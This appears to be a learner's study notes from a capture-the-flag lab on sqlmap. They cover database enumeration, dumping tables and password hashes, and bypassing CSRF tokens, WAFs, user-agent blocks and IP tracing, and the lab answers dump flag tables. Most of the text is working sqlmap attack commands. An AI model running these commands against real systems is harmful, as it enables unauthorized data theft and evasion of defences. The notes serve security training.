SQL Map Essentials
Advanced Database Enumeration
DB Schema Enumeration
--schema will give us the architectural diagram of the database
sqlmap -u "http://www.galapagh0st.com/?id=1" --schemaSearching for Data
--search will give us the ability to perform a search across a database
sqlmap -u "http://www.galapagh0st.com/?id=1" --search -T userThe above command has us perform a LIKE type search by looking for any table with user in the name
sqlmap -u "http://www.galapah0st.com/?id=1" --search -C passThe above command will search for all columns with pass in the name
sqlmap -u "http://www.example.com/?id=1" --dump -D master -T usersThe above will dump the users table from the master database NOTE: This will ask if we want to automatically crack hashes
DB Users Password Enumeration and Cracking
--passwords will allow us to get DB credential passwords
sqlmap -u "http://www.galapaghOst.com/?id=1" --passwords --batchthe above sqlmap command will allow us to grab said passwords
Advanced Database Enumeration Questions
sqlmap command I used for question 1
sqlmap -r Case1.txt --thread 10 --search -C style --batchsqlmap command for second question:
sqlmap -r Case1.txt --thread 10 --dump -D testdb --batchthen I looked at the dump… bet there is a faster way
Bypassing Web Application Protections
Anti-CSRF Token Bypass
--crf-token
sqlmap -u "http://www.galapagh0st.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"Unique Value Bypass
--randomize will allow us to randomize a value being passes
sqlmap -u "http://www.galapaghOst.com/?id=1&rp=29125" --randomize=rp --batch -v 5 | grep URICalculated Parameter Bypass
--eval
galapaGh0st@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib; h=hashlib.md5(id).hexdigest()" --batch -v 5 | grep URIIP Address Concealing
--proxy or --proxy-file if we have a list of proxys
--tor can be used too but requires some configuration. to make sure it is configured right you should use --check-tor
WAF Bypass
--skip-waf will allow us to not make as much noise
User-agent Blacklisting Bypass
If we get a 500 errors the first thing we should think of is that the user-agent is being blacklisted
if this is a case try --random-agent
Tamper Scripts
--tamper look on the sqlmap wiki for tamper scripts or use --list-tampers
Miscellaneous Bypasses
--chunked
Bypassing Web application Protections Questions
Question 1 - anti-csrf bypass with custom token
looks like the custom token is this
id=1&t0ken=wPvyKcHy4Y94MM4N3HklPul0V5nvaX2VBV4TFgCqosqlmap -u "http://94.237.63.45:52434/case8.php" --data="id=1&t0ken=wPvyKcHy4Y94MM4N3HklPul0V5nvaX2VBV4TFgCqo" --csrf-token="t0ken" --batch --dump -T flag8Question 2 - Take care of the UniqueID
sqlmap -u "http://94.237.63.45:52434/case9.php?id=1&uid=2231717078" --randomize=uid --batch --dump -T flag9Question 3 - Primitive protection
sqlmap -r Case10.txt --dump -T flag10 --thread 10 --batchTried the above just to see if it gave me any errors or a clue but I got the flag shrug
Question 4 - Filtering of Characters < and >
This sounds like we need to use tamper script between
However, lets run a normal cript to see what happens
sqlmap -r Case11.txt --dump -T flag11 --thread 10 --batchNormal looking errors.. interesting so we wont get a hint if this happens.
The following is the script used
sqlmap -r case11.txt --dump -T flag11 --thread 10 --batch --tamper=between